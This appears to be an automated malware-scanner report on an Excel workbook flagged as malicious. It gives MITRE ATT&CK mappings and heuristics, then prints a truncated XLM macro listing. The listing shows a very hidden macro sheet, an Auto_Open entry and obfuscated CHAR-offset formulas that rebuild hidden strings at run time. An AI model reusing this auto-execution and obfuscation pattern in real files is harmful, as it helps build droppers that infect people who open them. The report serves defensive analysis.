MALICIOUS (Risk Score: 142)
Malware Insights
MITRE ATT&CK
- T1059.005 Visual Basic
- T1203 Exploitation for Client Execution
The file contains Excel 4.0 macros, specifically an Auto_Open macro, which is a known technique for executing malicious code. The macro uses dangerous functions like RUN and appears to construct a string using character manipulation, likely to download and execute a payload. The presence of the 'PuRbH3OHt' string in the macro sheet and document body suggests it may be a key identifier or part of a constructed URL or command.
Heuristics (4)
- Excel 4.0 Auto_Open defined name [critical, OLE_XLM_AUTOOPEN_DEFINEDNAME]: oletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
- XLM Auto_Open with dangerous formula APIs [critical, OLE_XLM_DANGEROUS_FN]: Excel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
- Excel 4.0 (XLM) macro sheet present [medium, OLE_XLM_AUTOOPEN]: Workbook contains an Excel 4.0 macro sheet sub-stream. XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
- Embedded URL [info, EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://ns.adobe.com/xap/1.0/ (in document text, OLE body)
  - http://www.w3.org/1999/02/22-rdf-syntax-ns# (in document text, OLE body)
  - http://purl.org/dc/elements/1.1/ (in document text, OLE body)
  - http://ns.microsoft.com/photo/1.0/ (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| xlm_macros.txt | xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 24703 bytes |

SHA-256: 0a4d6fa1a3e00c667bee889fbf2b12918e14b311c234a5ee4ce65d3cbc26ef7a
Preview script: first 1,000 lines of the extracted script
```text
' 0085 14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - Sheet
' 0085 18 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, very hidden - PuRbH3OHt
' 0018 23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d PuRbH3OHt!BA1
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' Sheet,Reference,Formula,Value
' PuRbH3OHt,BA1,"FORMULA(DAY(NOW())+10,BA34)",""
' PuRbH3OHt,BA2,FULL.SCREEN(TRUE),""
' PuRbH3OHt,BA3,"FORMULA(CHAR(A1-BA34)&CHAR(A2-BA34)&CHAR(A3-BA34)&CHAR(A4-BA34)&CHAR(A5-BA34)&CHAR(A6-BA34)&CHAR(A7-BA34)&CHAR(A8-BA34)&CHAR(A9-BA34)&CHAR(A10-BA34)&CHAR(A11-BA34)&CHAR(A12-BA34)&CHAR(A13-BA34)&CHAR(A14-BA34)&CHAR(A15-BA34)&CHAR(A16-BA34)&CHAR(A17-BA34)&CHAR(A18-BA34)&CHAR(A19-BA34)&CHAR(A20-BA34)&CHAR(A21-BA34)&CHAR(A22-BA34)&CHAR(A23-BA34)&CHAR(A24-BA34)&CHAR(A25-BA34)&CHAR(A26-BA34)&CHAR(A27-BA34)&CHAR(A28-BA34)&CHAR(A29-BA34)&CHAR(A30-BA34)&CHAR(A31-BA34)&CHAR(A32-BA34)&CHAR(A33-BA34)&CHAR(A34-BA34)&CHAR(A35-BA34)&CHAR(A36-BA34)&CHAR(A37-BA34)&CHAR(A38-BA34)&CHAR(A39-BA34)&CHAR(A40-BA34),BB1)",""
' PuRbH3OHt,BA4,"FORMULA(CHAR(B1-BA34)&CHAR(B2-BA34)&CHAR(B3-BA34)&CHAR(B4-BA34)&CHAR(B5-BA34)&CHAR(B6-BA34)&CHAR(B7-BA34)&CHAR(B8-BA34)&CHAR(B9-BA34)&CHAR(B10-BA34)&CHAR(B11-BA34)&CHAR(B12-BA34)&CHAR(B13-BA34)&CHAR(B14-BA34)&CHAR(B15-BA34)&CHAR(B16-BA34)&CHAR(B17-BA34)&CHAR(B18-BA34)&CHAR(B19-BA34)&CHAR(B20-BA34)&CHAR(B21-BA34)&CHAR(B22-BA34)&CHAR(B23-BA34)&CHAR(B24-BA34)&CHAR(B25-BA34)&CHAR(B26-BA34)&CHAR(B27-BA34)&CHAR(B28-BA34)&CHAR(B29-BA34)&CHAR(B30-BA34)&CHAR(B31-BA34)&CHAR(B32-BA34)&CHAR(B33-BA34)&CHAR(B34-BA34)&CHAR(B35-BA34)&CHAR(B36-BA34)&CHAR(B37-BA34)&CHAR(B38-BA34)&CHAR(B39-BA34)&CHAR(B40-BA34),BB2)",""
' PuRbH3OHt,BA5,"FORMULA(CHAR(C1-BA34)&CHAR(C2-BA34)&CHAR(C3-BA34)&CHAR(C4-BA34)&CHAR(C5-BA34)&CHAR(C6-BA34)&CHAR(C7-BA34)&CHAR(C8-BA34)&CHAR(C9-BA34)&CHAR(C10-BA34)&CHAR(C11-BA34)&CHAR(C12-BA34)&CHAR(C13-BA34)&CHAR(C14-BA34)&CHAR(C15-BA34)&CHAR(C16-BA34)&CHAR(C17-BA34)&CHAR(C18-BA34)&CHAR(C19-BA34)&CHAR(C20-BA34)&CHAR(C21-BA34)&CHAR(C22-BA34)&CHAR(C23-BA34)&CHAR(C24-BA34)&CHAR(C25-BA34)&CHAR(C26-BA34)&CHAR(C27-BA34)&CHAR(C28-BA34)&CHAR(C29-BA34)&CHAR(C30-BA34)&CHAR(C31-BA34)&CHAR(C32-BA34)&CHAR(C33-BA34)&CHAR(C34-BA34)&CHAR(C35-BA34),BB3)",""
' PuRbH3OHt,BA6,"FORMULA(CHAR(D1-BA34)&CHAR(D2-BA34)&CHAR(D3-BA34)&CHAR(D4-BA34)&CHAR(D5-BA34)&CHAR(D6-BA34)&CHAR(D7-BA34)&CHAR(D8-BA34)&CHAR(D9-BA34)&CHAR(D10-BA34)&CHAR(D11-BA34)&CHAR(D12-BA34)&CHAR(D13-BA34)&CHAR(D14-BA34)&CHAR(D15-BA34)&CHAR(D16-BA34)&CHAR(D17-BA34)&CHAR(D18-BA34)&CHAR(D19-BA34)&CHAR(D20-BA34)&CHAR(D21-BA34)&CHAR(D22-BA34)&CHAR(D23-BA34)&CHAR(D24-BA34)&CHAR(D25-BA34)&CHAR(D26-BA34)&CHAR(D27-BA34)&CHAR(D28-BA34)&CHAR(D29-BA34)&CHAR(D30-BA34)&CHAR(D31-BA34)&CHAR(D32-BA34)&CHAR(D33-BA34)&CHAR(D34-BA34)&CHAR(D35-BA34),BB4)",""
' PuRbH3OHt,BA7,"FORMULA(CHAR(E1-BA34)&CHAR(E2-BA34)&CHAR(E3-BA34)&CHAR(E4-BA34)&CHAR(E5-BA34)&CHAR(E6-BA34)&CHAR(E7-BA34)&CHAR(E8-BA34)&CHAR(E9-BA34)&CHAR(E10-BA34)&CHAR(E11-BA34)&CHAR(E12-BA34)&CHAR(E13-BA34)&CHAR(E14-BA34)&CHAR(E15-BA34)&CHAR(E16-BA34)&CHAR(E17-BA34)&CHAR(E18-BA34)&CHAR(E19-BA34)&CHAR(E20-BA34)&CHAR(E21-BA34)&CHAR(E22-BA34)&CHAR(E23-BA34)&CHAR(E24-BA34)&CHAR(E25-BA34)&CHAR(E26-BA34)&CHAR(E27-BA34)&CHAR(E28-BA34)&CHAR(E29-BA34)&CHAR(E30-BA34)&CHAR(E31-BA34)&CHAR(E32-BA34)&CHAR(E33-BA34)&CHAR(E34-BA34)&CHAR(E35-BA34)&CHAR(E36-BA34)&CHAR(E37-BA34)&CHAR(E38-BA34)&CHAR(E39-BA34)&CHAR(E40-BA34)&CHAR(E41-BA34)&CHAR(E42-BA34)&CHAR(E43-BA34)&CHAR(E44-BA34)&CHAR(E45-BA34)&CHAR(E4 ... (truncated)
```